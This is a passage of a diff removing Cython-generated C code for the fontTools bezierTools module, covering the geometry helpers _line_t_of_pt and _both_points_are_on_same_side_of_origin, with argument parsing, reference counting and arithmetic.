__pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(__pyx_self, __pyx_v_s, __pyx_v_e, __pyx_v_pt); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s, PyObject *__pyx_v_e, PyObject *__pyx_v_pt) { - PyObject *__pyx_v_sx = NULL; - PyObject *__pyx_v_sy = NULL; - PyObject *__pyx_v_ex = NULL; - PyObject *__pyx_v_ey = NULL; - PyObject *__pyx_v_px = NULL; - PyObject *__pyx_v_py = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_t_6; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_line_t_of_pt", 1); - - /* "fontTools/misc/bezierTools.py":1128 - 
* - * def _line_t_of_pt(s, e, pt): - * sx, sy = s # <<<<<<<<<<<<<< - * ex, ey = e - * px, py = pt - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s))) || (PyList_CheckExact(__pyx_v_s))) { - PyObject* sequence = __pyx_v_s; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1128, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1128, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1128, __pyx_L1_error) - __pyx_L4_unpacking_done:; 
- } - __pyx_v_sx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_sy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1129 - * def _line_t_of_pt(s, e, pt): - * sx, sy = s - * ex, ey = e # <<<<<<<<<<<<<< - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e))) || (PyList_CheckExact(__pyx_v_e))) { - PyObject* sequence = __pyx_v_e; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1129, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1129, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - 
__Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1129, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ex = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ey = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1130 - * sx, sy = s - * ex, ey = e - * px, py = pt # <<<<<<<<<<<<<< - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - * # Line is a point! - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt))) || (PyList_CheckExact(__pyx_v_pt))) { - PyObject* sequence = __pyx_v_pt; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1130, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if 
(__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1130, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1130, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_px = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_py = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1131 - * ex, ey = e - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: # <<<<<<<<<<<<<< - * # Line is a point! - * return -1 - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_sx, __pyx_v_ex); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_6) { - } else { - __pyx_t_5 = __pyx_t_6; - goto __pyx_L10_bool_binop_done; - } - __pyx_t_3 = PyNumber_Subtract(__pyx_v_sy, __pyx_v_ey); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Absolute(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - 
__Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyObject_RichCompare(__pyx_t_2, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_6; - __pyx_L10_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1133 - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - * # Line is a point! - * return -1 # <<<<<<<<<<<<<< - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_int_neg_1); - __pyx_r = __pyx_int_neg_1; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1131 - * ex, ey = e - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: # <<<<<<<<<<<<<< - * # Line is a point! 
- * return -1 - */ - } - - /* "fontTools/misc/bezierTools.py":1135 - * return -1 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): # <<<<<<<<<<<<<< - * return (px - sx) / (ex - sx) - * else: - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_sx, __pyx_v_ex); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_v_sy, __pyx_v_ey); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyNumber_Absolute(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_t_2, Py_GT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1136 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): - * return (px - sx) / (ex - sx) # <<<<<<<<<<<<<< - * else: - * return (py - sy) / (ey - sy) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyNumber_Subtract(__pyx_v_px, __pyx_v_sx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_ex, __pyx_v_sx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); 
__pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1135 - * return -1 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): # <<<<<<<<<<<<<< - * return (px - sx) / (ex - sx) - * else: - */ - } - - /* "fontTools/misc/bezierTools.py":1138 - * return (px - sx) / (ex - sx) - * else: - * return (py - sy) / (ey - sy) # <<<<<<<<<<<<<< - * - * - */ - /*else*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_py, __pyx_v_sy); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_ey, __pyx_v_sy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._line_t_of_pt", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_sx); - __Pyx_XDECREF(__pyx_v_sy); - __Pyx_XDECREF(__pyx_v_ex); - __Pyx_XDECREF(__pyx_v_ey); - __Pyx_XDECREF(__pyx_v_px); - __Pyx_XDECREF(__pyx_v_py); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - -/* Python wrapper */ -static PyObject 
*__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin, "_both_points_are_on_same_side_of_origin(a, b, origin)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin = {"_both_points_are_on_same_side_of_origin", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_origin = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_both_points_are_on_same_side_of_origin (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_origin,0}; - if (__pyx_kwds) { 
- Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, 1); __PYX_ERR(0, 1141, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_origin)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, 2); __PYX_ERR(0, 1141, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_both_points_are_on_same_side_of_origin") < 0)) __PYX_ERR(0, 1141, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - 
values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_origin = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1141, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._both_points_are_on_same_side_of_origin", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_origin); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_origin) { - PyObject *__pyx_v_xDiff = NULL; - PyObject *__pyx_v_yDiff = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_t_6; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_both_points_are_on_same_side_of_origin", 1); - - /* "fontTools/misc/bezierTools.py":1142 - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): - * xDiff = (a[0] - 
origin[0]) * (b[0] - origin[0]) # <<<<<<<<<<<<<< - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - * return not (xDiff <= 0.0 and yDiff <= 0.0) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_origin, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_b, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_origin, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Subtract(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_v_xDiff = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1143 - * def _both_points_are_on_same_side_of_origin(a, b, origin): - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) # <<<<<<<<<<<<<< - * return not (xDiff <= 0.0 and yDiff <= 0.0) - * - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 
